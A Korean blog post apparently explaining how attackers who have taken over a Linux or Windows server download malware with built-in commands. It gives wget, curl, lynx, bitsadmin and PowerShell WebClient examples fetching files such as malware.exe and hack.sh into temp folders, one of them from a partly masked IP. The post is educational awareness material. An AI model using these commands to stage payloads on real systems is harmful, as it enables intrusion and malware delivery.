반응형
해커가 보안 취약점을 이용하여 시스템 장악후 외부 사이트로 부터 어떤 방법을 이용하여
악성코드를 다운로드 할까요?
가장 보편적인 방법으로는 OS 자체 명령어를 사용 하여 악성코드를 다운로드 합니다.
전제 조건
- 보안 취약점을 이용하여 시스템 장악 완료
- OS (LINUX, Windows) 기본 명령어를 제어 할수 있는 권한 획득
- 피해 서버 <-> 아웃바운드(인터넷) 네트워크 통신 가능 상태
Linux OS
wget 명령어 파일 다운로드
wget https://rootkey.tistory.com/code.sh
wget https://rootkey.tistory.com/code.sh -P files/download -O hack.sh
-P 디렉토리 저장
-O 파일명 지정
-b 백그라운드 실행
curl 명령어 파일 다운로드
curl https://rootkey.tistory.com/download/malware.exe -o malware.exe
curl -O https://rootkey.tistory.com/download/malware.sh .
curl -O https://rootkey.tistory.com/download/malware.sh > /tmp/malware.sh
lynx 명령어 파일 다운로드
lynx -source https://rootkey.tistory.com/sitemap.xml > sitemap.xml
해킹 실제 사례 보기
해킹 공격 유형
특정 APT 보안 장비 에서 실제 탐지 되는 다양한 해킹 공격 유형에 대해서 알아 보겠습니다. 아래 내용 외에도 수많은 해킹 공격 방법이 있으나 잘알려진 대표적인 유형에 대해서만 기술 하였
rootkey.tistory.com
Windows OS
bitsadmin 명령어 파일 다운로드
bitsadmin /transfer 작업명 /download 받는 파일URL 로컬경로파일
bitsadmin / transfer myjob01 / download / priority normal https://rootkey.tistory.com/test.exe c:\windows\temp\hackfile.exe
powershell 파일 다운로드
$client = New-Object System.Net.WebClient
$client.DownloadFile("http://91.x1.1x.10x/TWsTWqgRFxxxxx.exe","C:\Windows\TEMP\CAU81xxx.exe")실제 사례 보기
파일리스 해킹 공격 사례 Powershell fileless
파일리스 악성 코드 감염 사례 핵심 사항에 대해서 간단히 포스팅 합니다. 피해 사례 xxx 솔루션 사용 고객사 동일한 공격 벡터로 다수 서버 랜섬웨어에 감염 해커가 사용한 공격 방법 보안 취약
rootkey.tistory.com
명령어별로 수없이 다양한 옵션이 있지만 기본적인 옵션에 대해서만 설명하였습니다.
부디 도움이 되길 바랍니다.
TIP 더 보기 ...
'SYSTEM/TIP' 카테고리의 글 목록
정보 지식 공유와 나눔으로 상생의 가치 실현해요 ^^
rootkey.tistory.com
반응형
